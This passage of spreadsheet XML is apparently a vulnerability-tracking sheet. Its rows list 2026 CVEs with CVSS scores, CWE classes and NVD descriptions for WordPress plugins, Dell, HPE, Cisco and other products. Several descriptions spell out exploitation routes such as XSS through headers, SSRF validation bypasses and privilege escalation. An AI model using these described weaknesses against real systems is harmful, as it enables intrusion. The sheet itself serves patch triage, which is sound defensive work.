      </c>
      <c r="P525" s="5" t="inlineStr"/>
      <c r="Q525" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R525" s="5" t="inlineStr">
        <is>
          <t>The Kirki – Freeform Page Builder, Website Builder &amp; Customizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘comment’ parameter in all versions up to, and including, 6.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="S525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17037</t>
        </is>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B526" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18579</t>
        </is>
      </c>
      <c r="D526" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E526" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F526" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G526" s="5" t="inlineStr"/>
      <c r="H526" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I526" s="5" t="inlineStr"/>
      <c r="J526" s="5" t="inlineStr"/>
      <c r="K526" s="5" t="inlineStr"/>
      <c r="L526" s="5" t="inlineStr"/>
      <c r="M526" s="5" t="inlineStr"/>
      <c r="N526" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O526" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P526" s="5" t="inlineStr"/>
      <c r="Q526" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R526" s="5" t="inlineStr">
        <is>
          <t>The WP Photo Album Plus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'HTTP_X_FORWARDED_FOR' parameter in all versions up to, and including, 9.2.08.003 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The nonce failure path for the getshortcodedrenderedfenodelay action serves as the log-write trigger rather than an access barrier — a deliberately failed nonce check causes wppa_log() to record the attacker-supplied X-Forwarded-For value to disk, making the exploit fully reachable by unauthenticated callers via the wp_ajax_nopriv_wppa endpoint.</t>
        </is>
      </c>
      <c r="S526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18579</t>
        </is>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B527" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23855</t>
        </is>
      </c>
      <c r="D527" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E527" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F527" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G527" s="5" t="inlineStr"/>
      <c r="H527" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I527" s="5" t="inlineStr"/>
      <c r="J527" s="5" t="inlineStr"/>
      <c r="K527" s="5" t="inlineStr"/>
      <c r="L527" s="5" t="inlineStr"/>
      <c r="M527" s="5" t="inlineStr"/>
      <c r="N527" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O527" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P527" s="5" t="inlineStr"/>
      <c r="Q527" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R527" s="5" t="inlineStr">
        <is>
          <t>Dell iDRAC9, 14G versions prior to 7.00.00.184, 15G/16G versions prior to 7.30.10.50, and Dell iDRAC10, 17G versions prior to 1.30.30.50, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to command injection.</t>
        </is>
      </c>
      <c r="S527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23855</t>
        </is>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B528" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47773</t>
        </is>
      </c>
      <c r="D528" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E528" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F528" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G528" s="5" t="inlineStr"/>
      <c r="H528" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I528" s="5" t="inlineStr"/>
      <c r="J528" s="5" t="inlineStr"/>
      <c r="K528" s="5" t="inlineStr"/>
      <c r="L528" s="5" t="inlineStr"/>
      <c r="M528" s="5" t="inlineStr"/>
      <c r="N528" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O528" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P528" s="5" t="inlineStr"/>
      <c r="Q528" s="5" t="inlineStr">
        <is>
          <t>CWE-131, CWE-787</t>
        </is>
      </c>
      <c r="R528" s="5" t="inlineStr">
        <is>
          <t>ArduinoBLE enables Bluetooth Low Energy connectivity on certain Arduino models. Versions prior to 2.0.2 contain a missing bounds check in the ATT layer write request handler that allows a remote, unauthenticated BLE client to corrupt memory in the ATTClass global object. Devices running ArduinoBLE with one or more characteristics configured with the BLEEncryption property are affected. The fix is included starting from the 2.0.2 release.</t>
        </is>
      </c>
      <c r="S528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47773</t>
        </is>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B529" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73769</t>
        </is>
      </c>
      <c r="D529" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E529" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F529" s="5" t="inlineStr">
        <is>
          <t>security-alert@hpe.com</t>
        </is>
      </c>
      <c r="G529" s="5" t="inlineStr"/>
      <c r="H529" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I529" s="5" t="inlineStr"/>
      <c r="J529" s="5" t="inlineStr"/>
      <c r="K529" s="5" t="inlineStr"/>
      <c r="L529" s="5" t="inlineStr"/>
      <c r="M529" s="5" t="inlineStr"/>
      <c r="N529" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O529" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P529" s="5" t="inlineStr"/>
      <c r="Q529" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R529" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of vulnerable CPPM systems could allow an authenticated remote attacker to achieve remote code execution. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system.</t>
        </is>
      </c>
      <c r="S529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73769</t>
        </is>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B530" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73787</t>
        </is>
      </c>
      <c r="D530" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E530" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F530" s="5" t="inlineStr">
        <is>
          <t>security-alert@hpe.com</t>
        </is>
      </c>
      <c r="G530" s="5" t="inlineStr"/>
      <c r="H530" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I530" s="5" t="inlineStr"/>
      <c r="J530" s="5" t="inlineStr"/>
      <c r="K530" s="5" t="inlineStr"/>
      <c r="L530" s="5" t="inlineStr"/>
      <c r="M530" s="5" t="inlineStr"/>
      <c r="N530" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O530" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P530" s="5" t="inlineStr"/>
      <c r="Q530" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R530" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the CPPM web interface could allow an authenticated remote attacker to access directory information on a vulnerable system. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system.</t>
        </is>
      </c>
      <c r="S530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73787</t>
        </is>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B531" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74925</t>
        </is>
      </c>
      <c r="D531" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E531" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F531" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G531" s="5" t="inlineStr"/>
      <c r="H531" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I531" s="5" t="inlineStr"/>
      <c r="J531" s="5" t="inlineStr"/>
      <c r="K531" s="5" t="inlineStr"/>
      <c r="L531" s="5" t="inlineStr"/>
      <c r="M531" s="5" t="inlineStr"/>
      <c r="N531" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O531" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P531" s="5" t="inlineStr"/>
      <c r="Q531" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R531" s="5" t="inlineStr">
        <is>
          <t>The MultiVendorX  WordPress plugin before 5.0.16 does not restrict who can update its role and capability settings, allowing users holding its vendor role to grant that role administrator-level capabilities and take over the site.</t>
        </is>
      </c>
      <c r="S531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74925</t>
        </is>
      </c>
    </row>
    <row r="532">
      <c r="A532" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B532" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75927</t>
        </is>
      </c>
      <c r="D532" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E532" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F532" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G532" s="5" t="inlineStr"/>
      <c r="H532" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I532" s="5" t="inlineStr"/>
      <c r="J532" s="5" t="inlineStr"/>
      <c r="K532" s="5" t="inlineStr"/>
      <c r="L532" s="5" t="inlineStr"/>
      <c r="M532" s="5" t="inlineStr"/>
      <c r="N532" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O532" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P532" s="5" t="inlineStr"/>
      <c r="Q532" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R532" s="5" t="inlineStr">
        <is>
          <t>The PublishPress Capabilities – User Role Editor, Access Permissions, User Capabilities, Admin Menus plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.50.0. This is due to the `addPluginCapabilities()` function unconditionally granting the Editor role all 15 `manage_capabilities_*` capabilities — including `manage_capabilities`, `manage_capabilities_roles`, `manage_capabilities_settings`, and `manage_capabilities_backup` — via a hard-coded `$eligible_roles = ['administrator', 'editor']` assignment that runs automatically on the first `admin_init` after plugin activation with no administrator opt-in, persisting the grants directly to the database. This makes it possible for authenticated attackers with Editor-level access to elevate their privileges to a site-wide capability manager, enabling them to create, rename, and delete non-system roles, modify capabilities of non-administrator roles, restore role backups, and write arbitrary plugin options whose names begin with `cme_`, `capsman`, `pp_capabilities`, or `presspermit` via `update_option()`. The escalation stops short of full Administrator access, as WordPress's `map_meta_cap` layer still prevents the escalated Editor from granting administrator-only capabilities to other roles; however, all role-management and plugin-settings functionality gated solely on `manage_capabilities_*` capabilities remains fully accessible.</t>
        </is>
      </c>
      <c r="S532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75927</t>
        </is>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B533" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79972</t>
        </is>
      </c>
      <c r="D533" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E533" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F533" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G533" s="5" t="inlineStr"/>
      <c r="H533" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I533" s="5" t="inlineStr"/>
      <c r="J533" s="5" t="inlineStr"/>
      <c r="K533" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L533" s="5" t="inlineStr"/>
      <c r="M533" s="5" t="inlineStr"/>
      <c r="N533" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O533" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P533" s="5" t="inlineStr"/>
      <c r="Q533" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R533" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79972</t>
        </is>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B534" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81754</t>
        </is>
      </c>
      <c r="D534" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E534" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F534" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G534" s="5" t="inlineStr"/>
      <c r="H534" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I534" s="5" t="inlineStr"/>
      <c r="J534" s="5" t="inlineStr"/>
      <c r="K534" s="5" t="inlineStr"/>
      <c r="L534" s="5" t="inlineStr"/>
      <c r="M534" s="5" t="inlineStr"/>
      <c r="N534" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O534" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P534" s="5" t="inlineStr"/>
      <c r="Q534" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R534" s="5" t="inlineStr">
        <is>
          <t>The Vigilant – 100% Free Security Suite: Firewall, 2FA, Login, Headers, Scanner… plugin for WordPress is vulnerable to Stored Cross-Site Scripting via User-Agent Header in all versions up to, and including, 2.10.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The malicious payload is delivered passively by any unauthenticated visitor who triggers a failed login attempt with a crafted User-Agent header, requiring no further interaction from the attacker once stored.</t>
        </is>
      </c>
      <c r="S534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81754</t>
        </is>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B535" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81825</t>
        </is>
      </c>
      <c r="D535" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E535" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F535" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G535" s="5" t="inlineStr"/>
      <c r="H535" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I535" s="5" t="inlineStr"/>
      <c r="J535" s="5" t="inlineStr"/>
      <c r="K535" s="5" t="inlineStr"/>
      <c r="L535" s="5" t="inlineStr"/>
      <c r="M535" s="5" t="inlineStr"/>
      <c r="N535" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O535" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P535" s="5" t="inlineStr"/>
      <c r="Q535" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R535" s="5" t="inlineStr">
        <is>
          <t>The Simple Ajax Chat – Add a Fast, Secure Chat Box plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Chat Message in all versions up to, and including, &lt;= 20260811 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The nonce protecting chat message submission is publicly visible on the chat page, rendering it ineffective as an authentication barrier and allowing fully unauthenticated attackers to submit malicious messages that are stored persistently and rendered to all visitors on every page load.</t>
        </is>
      </c>
      <c r="S535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81825</t>
        </is>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B536" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82583</t>
        </is>
      </c>
      <c r="D536" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E536" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F536" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G536" s="5" t="inlineStr"/>
      <c r="H536" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I536" s="5" t="inlineStr"/>
      <c r="J536" s="5" t="inlineStr"/>
      <c r="K536" s="5" t="inlineStr"/>
      <c r="L536" s="5" t="inlineStr"/>
      <c r="M536" s="5" t="inlineStr"/>
      <c r="N536" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O536" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P536" s="5" t="inlineStr"/>
      <c r="Q536" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R536" s="5" t="inlineStr">
        <is>
          <t>NextGen Connect (Mirth Connect) versions 4.7.1 and earlier allow an authenticated user to execute arbitrary SQL through a Database Connector API, which could result in disclosure of stored credentials for connected systems, arbitrary file write, and a denial-of-service condition.</t>
        </is>
      </c>
      <c r="S536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82583</t>
        </is>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B537" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87020</t>
        </is>
      </c>
      <c r="D537" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E537" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F537" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G537" s="5" t="inlineStr"/>
      <c r="H537" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I537" s="5" t="inlineStr"/>
      <c r="J537" s="5" t="inlineStr"/>
      <c r="K537" s="5" t="inlineStr"/>
      <c r="L537" s="5" t="inlineStr"/>
      <c r="M537" s="5" t="inlineStr"/>
      <c r="N537" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O537" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P537" s="5" t="inlineStr"/>
      <c r="Q537" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R537" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in a specified pitch and buffer-size computation leads to a heap out-of-bounds write when Orthanc DICOM Server decodes an attacker-supplied PNG.</t>
        </is>
      </c>
      <c r="S537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87020</t>
        </is>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B538" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11573</t>
        </is>
      </c>
      <c r="D538" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E538" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F538" s="5" t="inlineStr">
        <is>
          <t>a59d8014-47c4-4630-ab43-e1b13cbe58e3</t>
        </is>
      </c>
      <c r="G538" s="5" t="inlineStr"/>
      <c r="H538" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I538" s="5" t="inlineStr"/>
      <c r="J538" s="5" t="inlineStr"/>
      <c r="K538" s="5" t="inlineStr"/>
      <c r="L538" s="5" t="inlineStr"/>
      <c r="M538" s="5" t="inlineStr"/>
      <c r="N538" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O538" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P538" s="5" t="inlineStr"/>
      <c r="Q538" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="R538" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled recursion (CWE-674) in the QDomDocument/QDomNode serialization path of the Qt XML module (QtXml, qtbase). QDomElementPrivate::save() and QDomNodePrivate::save() recurse mutually, consuming one stack frame per level of element nesting with no depth limit, no configurable bound and no error return. A document with deeply nested elements parses successfully but exhausts the call stack and terminates the process when serialized. Reachable via QDomDocument::toByteArray() (Qt 4.0 and later), QDomDocument::toString(), QDomDocument::toCString(), QDomNode::save(), and operator&lt;&lt;(QTextStream&amp;, const QDomNode&amp;). Denial of service only — no code execution and no memory disclosure.</t>
        </is>
      </c>
      <c r="S538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11573</t>
        </is>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B539" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20293</t>
        </is>
      </c>
      <c r="D539" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E539" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F539" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G539" s="5" t="inlineStr"/>
      <c r="H539" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I539" s="5" t="inlineStr"/>
      <c r="J539" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K539" s="5" t="inlineStr"/>
      <c r="L539" s="5" t="inlineStr"/>
      <c r="M539" s="5" t="inlineStr"/>
      <c r="N539" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O539" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P539" s="5" t="inlineStr"/>
      <c r="Q539" s="5" t="inlineStr">
        <is>
          <t>CWE-749</t>
        </is>
      </c>
      <c r="R539" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the Unified Extensible Firmware Interface (UEFI) Shell implementation of Cisco UCS Servers and UCS-based appliances could allow an authenticated attacker with valid credentials for a user account with the role of user or admin&amp;nbsp;or an unauthenticated attacker with physical access to an affected device to bypass UEFI Secure Boot validation checks and execute unauthorized software.
This vulnerability is due to the availability of memory write commands in the UEFI Shell while UEFI Secure Boot is enabled on a device. An attacker could exploit this vulnerability by selecting the UEFI Shell boot option at boot time and using available shell commands to modify UEFI memory variables. A successful exploit could allow the attacker to manipulate the preboot environment, overwrite UEFI Secure Boot-related memory values, and execute unauthorized software on the affected device.</t>
        </is>
      </c>
      <c r="S539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20293</t>
        </is>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B540" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54166</t>
        </is>
      </c>
      <c r="D540" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E540" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F540" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G540" s="5" t="inlineStr"/>
      <c r="H540" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I540" s="5" t="inlineStr"/>
      <c r="J540" s="5" t="inlineStr"/>
      <c r="K540" s="5" t="inlineStr"/>
      <c r="L540" s="5" t="inlineStr"/>
      <c r="M540" s="5" t="inlineStr"/>
      <c r="N540" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O540" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P540" s="5" t="inlineStr"/>
      <c r="Q540" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R540" s="5" t="inlineStr">
        <is>
          <t>Shelf is a platform for tracking physical assets. Prior to version 1.20.3, authenticated users with the `asset:import` permission can trigger server-side HTTP requests to attacker-controlled URLs through the Asset CSV Content Import feature. The `imageUrl` validation logic can be bypassed through multiple techniques, including image-extension suffixes, image-related path keywords, domain substring matching, and redirect chains. After validation, the server performs an unrestricted `fetch()` request to the supplied URL. This results in a Server-Side Request Forgery (SSRF) vulnerability that allows attackers to reach internal network services, cloud metadata endpoints, and arbitrary external hosts from the application's network context. Additionally, response bodies are fully buffered before size validation, creating a potential memory exhaustion vector. Version 1.20.3 patches the issue.</t>
        </is>
      </c>
      <c r="S540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54166</t>
        </is>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B541" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62089</t>
        </is>
      </c>
      <c r="D541" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E541" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F541" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G541" s="5" t="inlineStr"/>
